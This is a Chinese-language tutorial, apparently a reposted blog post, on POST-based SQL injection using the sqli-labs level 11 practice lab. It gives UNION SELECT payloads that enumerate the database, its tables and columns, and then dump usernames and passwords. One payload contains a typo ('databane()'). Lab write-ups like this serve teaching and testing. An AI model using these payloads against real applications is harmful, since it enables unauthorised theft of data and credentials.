SQL注入之post注入

SQL注入之post注入GET 请求的参数是通过 URL 传输的 而 URL 的长度往往被浏览器所限制 通常为 2048 个字符 因此 GET 请求的参数传输长度是被限制的

大家好,欢迎来到IT知识分享网。

目录

get传参和post传参区别

post注入

post注入实例

实验环境

实验步骤

1、输入1’出现报错语句,发现注入点

2、爆出列数

3、使用联合查询,爆出数库名

4、爆出表名

5、爆出列名

6、爆出数据


get传参和post传参区别

post注入

post注入是一种常见的网络攻击方式,其本质在于将用户输入的数据作为代码执行。这种攻击通常发生在用户通过POST请求提交数据时,如果程序没有对用户输入进行适当的过滤或验证,攻击者就可以通过在提交的数据中插入恶意注入来访问、修改或删除数据库中的数据。POST注入的高危点包括登录框、查询框以及任何与数据库有交互的表单。

post注入实例

实验环境

sql-lab第11关

实验步骤

1、输入1’出现报错语句,发现注入点

SQL注入之post注入

2、爆出列数

在使用order时候,发现使用第三行排序时会报错

SQL注入之post注入

3、使用联合查询,爆出数库名

注入语句:

-1' union select databane(),2#

SQL注入之post注入

4、爆出表名

注入语句:

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

SQL注入之post注入

5、爆出列名

注入语句:

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

SQL注入之post注入

6、爆出数据

注入语句:

-1' union select group_concat(username),group_concat(password) from users#

SQL注入之post注入


不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/137258.html

(0)
上一篇 2025-06-21 20:20
下一篇 2025-06-21 20:33

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注微信